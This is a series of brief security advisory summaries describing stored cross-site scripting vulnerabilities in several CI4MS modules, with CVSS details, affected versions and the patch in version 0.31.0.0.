Stored cross-site scripting in CI4MS blog module allows authenticated attackers to inject malicious JavaScript that executes in victims' browsers across multiple application views. The vulnerability affects all versions prior to 0.31.0.0 and stems from insufficient input sanitization when creating or editing blog posts combined with unsafe output rendering. Attack requires low-privilege authentication (PR:L) but has scope change (S:C), enabling session hijacking and credential theft across user contexts. Vendor-released patch available in version 0.31.0.0. EPSS and KEV data not provided; no public exploit identified at time of analysis.

Stored cross-site scripting in CI4MS (CodeIgniter 4 CMS) allows authenticated users with blog post management privileges to inject malicious JavaScript through unsanitized category fields, affecting all users who view blog posts containing the poisoned categories. The vulnerability is confirmed patched in version 0.31.0.0. With CVSS 9.1 (Critical) due to scope change and high confidentiality impact, and low attack complexity requiring only low-privilege authentication, this represents significant risk in multi-user CMS environments despite no confirmed active exploitation (no CISA KEV listing) or public exploit code identified at time of analysis.

Stored cross-site scripting (XSS) in CI4MS page management functionality allows authenticated attackers to inject malicious JavaScript that executes in both administrative contexts and public-facing pages. Affecting CI4MS versions prior to 0.31.0.0, this vulnerability requires low-privilege authentication (PR:L) but enables scope change (S:C) with network-based remote exploitation (AV:N) and low attack complexity (AC:L). Vendor-released patch version 0.31.0.0 addresses the input sanitization failures. No public exploit identified at time of analysis; CVSS 9.1 reflects the scope change and cross-context impact enabling privilege escalation and potential administrator session compromise.

Stored cross-site scripting (XSS) in CI4MS menu management allows authenticated users with low privileges to inject malicious scripts that execute in administrator and public user contexts. Affecting CI4MS versions prior to 0.31.0.0, attackers can exploit insufficient input sanitization when adding Posts to navigation menus, achieving cross-scope code execution (CVSS scope changed) with potential for session hijacking and administrative account compromise. Vendor-released patch available in version 0.31.0.0. No public exploit identified at time of analysis, though EPSS data not available for risk quantification.